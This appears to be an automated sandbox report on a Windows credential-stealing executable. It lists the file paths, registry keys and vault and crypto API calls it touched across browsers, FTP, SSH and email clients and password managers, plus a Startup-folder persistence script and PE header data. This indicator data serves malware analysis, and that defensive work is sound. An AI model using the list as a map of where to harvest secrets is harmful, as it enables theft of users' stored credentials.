C:\Users\user\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
C:\Users\user\Documents\*.tlp
C:\Users\user\Documents\*.bscp
C:\Users\user\Documents\*.vnc
C:\Users\user\Desktop\*.vnc
C:\Users\user\Documents\mSecure
C:\ProgramData\Syncovery
C:\Program Files (x86)\FreshWebmaster\FreshFTP\FtpSites.SMF
C:\Users\user\AppData\Roaming\BitKinex\bitkinex.ds
C:\Users\user\AppData\Roaming\UltraFXP\sites.xml
C:\Users\user\AppData\Roaming\FTP Now\sites.xml
C:\Program Files (x86)\Odin Secure FTP Expert\QFDefault.QFQ
C:\Program Files (x86)\Odin Secure FTP Expert\SiteInfo.QFP
C:\Program Files (x86)\Foxmail\mail
C:\Foxmail*
C:\Users\user\AppData\Roaming\Pocomail\accounts.ini
C:\Users\user\Documents\Pocomail\accounts.ini
C:\Users\user\AppData\Roaming\GmailNotifierPro\ConfigData.xml
C:\Users\user\AppData\Roaming\DeskSoft\CheckMail
C:\Program Files (x86)\WinFtp Client\Favorites.dat
C:\Windows\32BitFtp.TMP
C:\Windows\32BitFtp.ini
C:\FTP Navigator\Ftplist.txt
C:\Softwarenetz\Mailing\Daten\mailing.vdt
C:\Users\user\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
C:\Users\user\Documents\*Mailbox.ini
C:\Users\user\Documents\yMail2\POP3.xml
C:\Users\user\Documents\yMail2\SMTP.xml
C:\Users\user\Documents\yMail2\Accounts.xml
C:\Users\user\Documents\yMail\ymail.ini
C:\Users\user\AppData\Roaming\TrulyMail\Data\Settings\user.config
C:\Users\user\Documents\*.spn
C:\Users\user\Desktop\*.spn
C:\Users\user\AppData\Roaming\To-Do DeskList\tasks.db
C:\Users\user\AppData\Roaming\stickies\images
C:\Users\user\AppData\Roaming\stickies\rtf
C:\Users\user\AppData\Roaming\NoteFly\notes
C:\Users\user\AppData\Roaming\Conceptworld\Notezilla\Notes8.db
C:\Users\user\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt
C:\Users\user\Documents
C:\Users\user\Documents\*.kdbx
C:\Users\user\Desktop
C:\Users\user\Desktop\*.kdbx
C:\Users\user\Documents\*.kdb
C:\Users\user\Desktop\*.kdb
C:\Users\user\Documents\Enpass
C:\Users\user\Documents\My RoboForm Data
C:\Users\user\Documents\1Password
C:\Users\user\AppData\Local\Temp\Mikrotik\Winbox
C:\Users\user\AppData\Roaming\sticik\NETAPI32.DLL
C:\Windows\System32\netapi32.dll
C:\Users\user\AppData\Roaming\sticik\netutils.dll
C:\Windows\System32\netutils.dll
C:\Users\user\AppData\Roaming\sticik\srvcli.dll
C:\Windows\System32\srvcli.dll
C:\Users\user\AppData\Roaming\24CFE6
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
C:\Users\user\AppData\Roaming\Microsoft\Credentials
C:\Users\user\AppData\Roaming\Microsoft\Credentials\*
C:\Users\user\AppData\Local\Microsoft\Credentials
C:\Users\user\AppData\Local\Microsoft\Credentials\*
C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
C:\Windows\Temp
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Users\user\AppData\Local\Temp\D1B132.exe
C:\Windows\System32\netapi32.dll
C:\Windows\System32\netutils.dll
C:\Windows\System32\srvcli.dll
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Users\user\AppData\Roaming\sticik\stickiy.exe
C:\Users\user\AppData\Roaming\sticik\stickiy.exe:ZoneIdentifier
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sticik.vbs
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
C:\Users\user\AppData\Roaming\sticik\stickiy.exe
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sticik.vbs
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
HKEY_CURRENT_USER\Software\Borland\Locales
HKEY_LOCAL_MACHINE\Software\Borland\Locales
HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari
HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon
HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock
HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Pale Moon
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox
HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
HKEY_CURRENT_USER\Software\Ghisler\Total Commander
HKEY_CURRENT_USER\Software
HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\JavaSoft
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\ODBC
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Sysinternals
HKEY_CURRENT_USER\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Bitvise\BvSshClient
HKEY_CURRENT_USER\Software\VanDyke\SecureFX
HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts
HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
HKEY_CURRENT_USER\Software\IncrediMail\Identities
HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail
HKEY_CURRENT_USER\Software\WinChips\UserAccounts
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0983914516512248bf1031360569f651
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0983914516512248bf1031360569f651\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\390687b675150348af0b3ed5b57f371b
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\390687b675150348af0b3ed5b57f371b\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\85e0ee07445e6649ba5bc44e8c7f096a
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\85e0ee07445e6649ba5bc44e8c7f096a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\89add512dfedc442ad3626bfcae3c4a1
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\89add512dfedc442ad3626bfcae3c4a1\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b7dcff830d0db247ab3e99f6d18d3db2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b7dcff830d0db247ab3e99f6d18d3db2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e64b0e0e47cac246ae1cad77acfe3425
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e64b0e0e47cac246ae1cad77acfe3425\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e67eb059ba9d6642890e6a6aa53ab9fb
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e67eb059ba9d6642890e6a6aa53ab9fb\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f0bb1e5f09f80a488274ca81ffbccd9c
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f0bb1e5f09f80a488274ca81ffbccd9c\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f4ef05d8e05bfb4584a20de2c515cad6
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f4ef05d8e05bfb4584a20de2c515cad6\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x9b\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd1\x98\xef\xbf\xbd\xd0\x9e\xef\xbf\xbd\xef\xbf\xbd\xd0\x9c\xef\xbf\xbd\xef\xbf\xbd\xd1\x8f\xef\xbf\xbd\xef\xbf\xbd
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0983914516512248bf1031360569f651\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\390687b675150348af0b3ed5b57f371b\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\85e0ee07445e6649ba5bc44e8c7f096a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\89add512dfedc442ad3626bfcae3c4a1\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b7dcff830d0db247ab3e99f6d18d3db2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e64b0e0e47cac246ae1cad77acfe3425\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e67eb059ba9d6642890e6a6aa53ab9fb\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f0bb1e5f09f80a488274ca81ffbccd9c\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f4ef05d8e05bfb4584a20de2c515cad6\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
kernel32.dll.GetDiskFreeSpaceExA
oleaut32.dll.VariantChangeTypeEx
oleaut32.dll.VarNeg
oleaut32.dll.VarNot
oleaut32.dll.VarAdd
oleaut32.dll.VarSub
oleaut32.dll.VarMul
oleaut32.dll.VarDiv
oleaut32.dll.VarIdiv
oleaut32.dll.VarMod
oleaut32.dll.VarAnd
oleaut32.dll.VarOr
oleaut32.dll.VarXor
oleaut32.dll.VarCmp
oleaut32.dll.VarI4FromStr
oleaut32.dll.VarR4FromStr
oleaut32.dll.VarR8FromStr
oleaut32.dll.VarDateFromStr
oleaut32.dll.VarCyFromStr
oleaut32.dll.VarBoolFromStr
oleaut32.dll.VarBstrFromCy
oleaut32.dll.VarBstrFromDate
oleaut32.dll.VarBstrFromBool
user32.dll.GetMonitorInfoA
user32.dll.GetSystemMetrics
user32.dll.EnumDisplayMonitors
user32.dll.AnimateWindow
comctl32.dll.InitializeFlatSB
comctl32.dll.UninitializeFlatSB
comctl32.dll.FlatSB_GetScrollProp
comctl32.dll.FlatSB_SetScrollProp
comctl32.dll.FlatSB_EnableScrollBar
comctl32.dll.FlatSB_ShowScrollBar
comctl32.dll.FlatSB_GetScrollRange
comctl32.dll.FlatSB_GetScrollInfo
comctl32.dll.FlatSB_GetScrollPos
comctl32.dll.FlatSB_SetScrollPos
comctl32.dll.FlatSB_SetScrollInfo
comctl32.dll.FlatSB_SetScrollRange
user32.dll.SetLayeredWindowAttributes
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptReleaseContext
vaultcli.dll.VaultEnumerateItems
vaultcli.dll.VaultEnumerateVaults
vaultcli.dll.VaultFree
vaultcli.dll.VaultGetItem
vaultcli.dll.VaultOpenVault
vaultcli.dll.VaultCloseVault
sechost.dll.LookupAccountSidLocalW
netapi32.dll.NetUserGetInfo
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptSetKeyParam
cryptsp.dll.CryptDecrypt
cryptsp.dll.CryptDestroyKey
"C:\Users\user\AppData\Roaming\sticik\stickiy.exe"
C:\Windows\system32\lsass.exe
56BC56B24CFE6F2024462707
VaultSvc

Binary Entropy

PE Information

Image Base 0x00400000
Entry Point 0x00482cf0
Reported Checksum 0x00000000
Actual Checksum 0x000d66e5
Minimum OS Version 4.0
Compile Time 1992-05-14 01:02:16
Import Hash 5b5db1d2ae3530a881a13aa0779c42ea

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
CODE 0x00001000 0x00081d38 0x00081e00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.51
DATA 0x00083000 0x0000f6c8 0x0000f800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 6.59
BSS 0x00093000 0x00000ead 0x00000000 IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.idata 0x00094000 0x00002442 0x00002600 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 4.82
.tls 0x00097000 0x00000010 0x00000000 IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rdata 0x00098000 0x00000018 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 0.21
